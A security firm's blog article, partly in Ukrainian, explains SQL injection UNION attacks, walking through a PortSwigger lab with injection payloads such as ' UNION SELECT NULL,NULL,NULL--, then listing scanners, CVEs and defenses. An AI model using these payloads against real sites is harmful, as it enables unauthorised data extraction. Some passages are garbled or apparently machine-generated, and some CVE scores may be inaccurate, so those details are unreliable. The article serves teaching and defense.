20 Лют, 2024

SQL injection UNION attack

SQL injection UNION attack

SQL injection UNION attack is a type of security vulnerability that occurs when an attacker exploits a SQL injection vulnerability to append an additional, malicious SQL query to the original query. This is typically achieved using the “UNION” SQL operator, which allows the attacker to combine the results of two or more SELECT queries into a single result set. The attack is used to extract sensitive information from the database, such as usernames, passwords, or other data that the attacker is not authorized to access.

The attack works by manipulating the input to a web application (such as form fields, cookies, or HTTP headers) that is included in SQL queries. If the application does not properly sanitize user input, an attacker can insert SQL code into the input field. By using the UNION operator, the attacker can append a crafted SELECT query to the legitimate query the application makes to the database. If successful, the database will execute this combined query, and the attacker can extract information from other tables within the database.

This type of attack is particularly dangerous because it can lead to unauthorized access to sensitive data, compromise of user accounts, and potentially full control over the database.

Приклади експлуатації

To gain a deeper understanding of SQL injection using the UNION operator, consider a practical exercise provided by PortSwigger, which is renowned for its expertise in web security . This specific exercise focuses on a SQL injection vulnerability found within a product category filter. The vulnerability allows the injection of a UNION-based query, which can combine results from multiple tables within a database.

The goal of this lab is to craft a UNION attack to fetch data from different tables. To achieve this, one must first establish the number of columns the original query returns. Subsequently, the next step involves identifying which of these columns is capable of holding string data.

To complete the lab, one must successfully manipulate the query to return an additional row containing a certain value provided by the lab.

Let’s start by looking at the filter request on the site.

Let’s send this request to Reapeter so we can be comfortable looking at the request/response. First let’s determine how many columns the database has. Let’s do this with this payload ‘ UNION SELECT NULL,NULL,NULL–, each “NULL” is a column.

We have successfully defined that there are 3 columns in the database, now let’s define the columns shared with string data. We will do this by using this query ‘ UNION SELECT ‘123’,’123′,’123′–.

Ok, now let’s run this lab and get the database to send string ‘XyQQQCk’. Let’s do it with this command ‘ UNION SELECT NULL,’XyQQQCk’,NULL–.

Scanners that detect vulnerabilities

  1. OWASP ZAP (Zed Attack Proxy): An open-source web тестування безпеки додатків scanner that can find a wide range of security vulnerabilities, including SQL injection.

  2. SQLMap: An open-source Пентест tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers.

  3. Burp Suite: This integrated platform provides various tools for performing AMAZON WEB SERVICES of web applications. It includes both automated scanning tools and manual testing utilities that can be used to detect SQL injection vulnerabilities.

  4. Acunetix: A fully automated web vulnerability scanner that can detect and report on a variety of vulnerabilities, including all types of SQL Injection.

  5. Netsparker: An easy-to-use web application security scanner that can automatically find SQL Injection, XSS, and other vulnerabilities in your web applications and web services.

  6. Veracode: Provides automated static and dynamic analysis to identify and remediate vulnerabilities, including SQL injection.

  7. AppScan: An IBM product that provides automated security testing tools that can identify and manage vulnerabilities for web, mobile, and desktop applications.

  8. w3af: An open-source web application security scanner which allows users to find and exploit several security vulnerabilities.

Average CVSS score for SQL injection UNION attack

The Common Vulnerability Scoring System (CVSS) provides a way to capture the principal characteristics of a security vulnerability and produce a numerical score reflecting its severity. The numerical score can then be translated into a qualitative representation (such as low, medium, high, and critical) to help organizations properly assess and prioritize their vulnerability management processes.

For SQL injection attacks, including those that exploit the UNION statement, the CVSS score can be quite high due to the potential for an attacker to read, modify, or delete sensitive data, or even execute administrative operations on the database. An SQL injection vulnerability typically results in a CVSS score of 7.5 or above, often reaching 9.0 or more, particularly if the attack can be exploited remotely without authentication, which would categorize it as “critical”.

The actual score can vary based on several factors outlined in the CVSS, such as:

Attack Vector (AV): How the vulnerability is exploited (e.g., network, adjacent network, local, physical).

Attack Complexity (AC): The complexity of the attack required to exploit the vulnerability.

Privileges Required (PR): The level of privileges an attacker must possess before successfully exploiting the vulnerability.

User Interaction (UI): Whether the vulnerability requires user interaction to be exploited.

Scope (S): Whether a successful exploit impacts resources beyond the scope of the vulnerable component.

Confidentiality (C): Impact on the confidentiality of the system.

Integrity (I): Impact on the integrity of the system.

Availability (A): Impact on the availability of the system.

To get the average CVSS score for SQL injection UNION attacks specifically, one would typically look at vulnerability databases that aggregate this information, such as the National Vulnerability Database (NVD), to get an average score based on reported vulnerabilities. However, without access to a real-time database or a recent security report, I cannot provide a current average CVSS score.

It’s important to note that each vulnerability may have its own CVSS score based on its specific details, and averages can be somewhat misleading if not put into the proper context of the affected system and environment.

CVES related to SQL injection UNION attack

CVE-2021-37593 had a medium base score of 6.4 on the CVSS 2.0 scale. It was related to PEEL Shopping, where a remote SQL injection allowed unauthenticated users to affect the execution of predefined SQL commands (NVD).

CVE-2021-43408 was associated with the “Duplicate Post” WordPress plugin and had a high CVSS 2.0 score of 9.0, indicating that an exploit could result in a complete compromise of confidentiality, integrity, and availability (NVD).

CVE-2022-24124 targeted Casdoor before version 1.13.1 and had a CVSS 3.1 base score of 7.5, marking it as high severity. The vulnerability could be exploited to dump sensitive files like /etc/passwd (Qualys Security Blog).

CVE-2021-1225 was reported in the web-based management interface of Cisco SD-WAN vManage Software and had a critical CVSS 3.x base score of 9.1. This vulnerability could allow an unauthenticated, remote attacker to conduct SQL injection attacks (NVD).

CVE-2023-34362 involved MOVEit Transfer SQL Injection Vulnerabilities. Although no CVSS score is provided, recommendations include disabling HTTP/HTTPS traffic and applying relevant patches (Unit 42 Palo Alto Networks).

CVE-2020-12271 affected Sophos XG Firewall devices and was part of CISA’s Known Exploited Vulnerabilities Catalog, which required actions to apply updates per vendor instructions (NVD).

CVE-2019-5110 had a high CVSS 3.x base score of 8.8 and was reported in Forma LMS 2.2.1, where specially crafted web requests could cause SQL injections (NVD).

CVE-2022-3323 with a high CVSS 3.1 base score of 7.5 was found in Advantech iView, where a remote attacker could exploit a vulnerability to retrieve the iView admin password (NVD).

To study SQL injection UNION attack

To study SQL injection UNION attacks, you can dive into resources that explain the mechanics of the attack, how it’s executed, and ways to prevent it. Union SQL injection is a type of attack that allows an intruder to extend the results returned by an original query, potentially exposing sensitive information from the database. The key to successfully executing a UNION SQL injection attack is to ensure that the malicious query has the same number and type of columns as the original query, which can be determined using specific techniques.

One common method to determine the number of columns used by the original query involves injecting a series of ORDER BY clauses, increasing the index until an error occurs, which indicates you’ve exceeded the actual number of columns. Another approach is to use the UNION SELECT technique, where you append NULL values to the original query. You increase the number of NULL values until the database doesn’t return an error, which suggests that the number of NULL values matches the number of columns in the original query.

Once you know the number of columns, you can test which columns can handle string data by injecting strings into each column one by one using UNION SELECT. If the application’s response includes the injected string, that column can be used to retrieve string data.

These techniques are fundamental to understanding and performing SQL injection UNION attacks in a controlled lab environment, such as the ones provided by web security learning platforms. PortSwigger’s Web Security Academy is a notable resource where you can learn about and practice these techniques in a safe and legal setting. Additionally, for a broader view on Union SQL injections and tips for prevention, Bright Security offers insights and contrasts between Union-based and error-based SQLi, detailing how each attack works and how to prevent them

How to be protected from SQL injection UNION attack

  1. Instead of building SQL queries with user input, use prepared statements with placeholders for data. This method allows the database to distinguish between code and data, regardless of what the user input is.

  2. Stored procedures can safeguard against SQL injection, but they must be written correctly to avoid the same pitfalls as dynamic SQL.

  3. Validate user inputs to ensure they conform to expected formats. This can be done by using regular expressions, or by checking against a list of acceptable values.

  4. If prepared statements are not possible, ensure all user-supplied input is escaped. This makes the input safe to use in a SQL query.

  5. Object-Relational Mapping (ORM) libraries are not impervious to SQL injection, but they can abstract the SQL generation process and reduce the likelihood of injection.

  6. Ensure that the database account used by the web application has the least privileges necessary. This can limit what an attacker can do if they exploit a SQL injection flaw.

  7. Use custom error messages for users, which prevent attackers from learning about the structure of your database through error messages.

  8. Keep your database management system (DBMS) and all your platforms updated with the latest patches.

  9. Regularly test your web applications using both static and dynamic application SECURITY TESTING tools to find and fix vulnerabilities.

  10. Deploy WAFs to help identify and block SQL injection attacks, including those that use the UNION operator, by inspecting incoming traffic and filtering out malicious SQL.

  11. Implement effective monitoring to detect unusual database activities that could indicate a SQL injection attack.


In conclusion, the threat posed by SQL injection UNION attacks is a stark reminder of the critical need for robust security practices in web application development and maintenance. Through a combination of rigorous input validation, the implementation of parameterized queries, and the deployment of web application firewalls, developers and administrators can fortify their defenses against such intrusions.

This article has outlined not only the mechanics of the UNION attack but also practical solutions to mitigate the risk. The real-world examples and CVEs discussed serve as a testament to the potential impact of such vulnerabilities and the importance of continual vigilance.

As the landscape of cyber threats evolves, the responsibility to protect sensitive data becomes ever more pressing. By adopting a proactive approach to security, informed by the latest research and utilizing cutting-edge tools, organizations can significantly reduce their exposure to SQL injection attacks.

Remember, security is not a one-time setup but a dynamic, ongoing process. Regular updates, patches, and security training form the bedrock of a secure web environment. In the end, a commitment to security is a commitment to the trust of your users and the integrity of your systems. Stay informed, stay vigilant, and prioritize security in every aspect of your digital presence.

Інші Послуги

Готові до безпеки?

зв'язатися з нами